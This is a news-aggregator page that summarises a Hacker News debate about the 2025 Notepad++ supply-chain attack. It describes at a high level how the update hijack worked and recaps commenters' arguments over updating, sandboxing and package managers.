February 3, 2026

Trust the update? Trust nothing?

Article URL →HN comments →

Notepad++ supply chain attack breakdown

Update roulette: Notepad++ hack has users joking, raging, and sandboxing

TLDR: Hackers hijacked Notepad++ updates in 2025 and rotated sneaky downloads to hit a few targeted machines, though security tools report blocking many attempts. Commenters are split between updating everything, updating nothing, or sandboxing apps—while debating if package managers fix trust or just move the risk.

Hackers slipped malicious updates into Notepad++ last year, rotating servers and sneaky payloads while targeting a small list of victims across Vietnam, El Salvador, Australia, and a Philippine government office. The devs say it started with a hosting-provider mishap; researchers like Kaspersky say their tools stopped the attacks in the wild. But the real fireworks? The comments.

One camp is spiraling over the paradox: update to stay safe vs. don’t update to avoid poisoned updates. As user troad groaned, it’s now “best practice” to do both. Cue the meme storm: “Schrödinger’s Update” and “This Is Fine” dog sipping coffee while Windows auto-updates. Others are fighting back with personal fortress strategies—sandbox everything—as ashishb vows to keep apps fenced in so they can’t snoop cloud drives or cookie jars.

Then came the spice. bluenose69 side-eyed the headline’s claim that Notepad++ is “popular among developers,” lighting a mini culture war: Team N++ nostalgia vs. Team “who still uses that?” Meanwhile, porise planted a flag for package managers—the app store–style installers—declaring they “win in the end,” prompting a brawl over whether centralizing trust reduces risk or just moves the single point of failure.

Amid the drama, one curious voice asked if the stolen system info (like user names and running apps) even matters. The crowd answered: yes—reconnaissance is foreplay for bigger hacks. Bottom line: Notepad++ had a bad season, the internet had a worse debate, and everyone’s second-guessing the “Update” button on sight. Read the devs’ note here.

Key Points

  • Notepad++ update infrastructure was compromised via a hosting provider incident (June–Sept 2025), with attacker access persisting until Dec 2025.
  • Attackers rotated C2 servers, downloaders, and payloads across three infection chains (July–Oct 2025), targeting ~12 machines across several countries and sectors.
  • Kaspersky reports its solutions blocked the attacks and publishes previously unseen IoCs related to the incident.
  • Chain #1 delivered a malicious update.exe (NSIS installer) via GUP.exe, collected system info, uploaded it to temp.sh via curl, and signaled the URL in the User-Agent.
  • The installer dropped multiple files, including legitimate ProShow.exe, which was abused to execute the final malicious payload.

Hottest takes

"not update them too much" — troad
"popular among developers". Really? — bluenose69
"package managers win in the end" — porise

Save News

Made with <3 by @siedrix and @shesho from CDMX. Powered by Forge&Hive.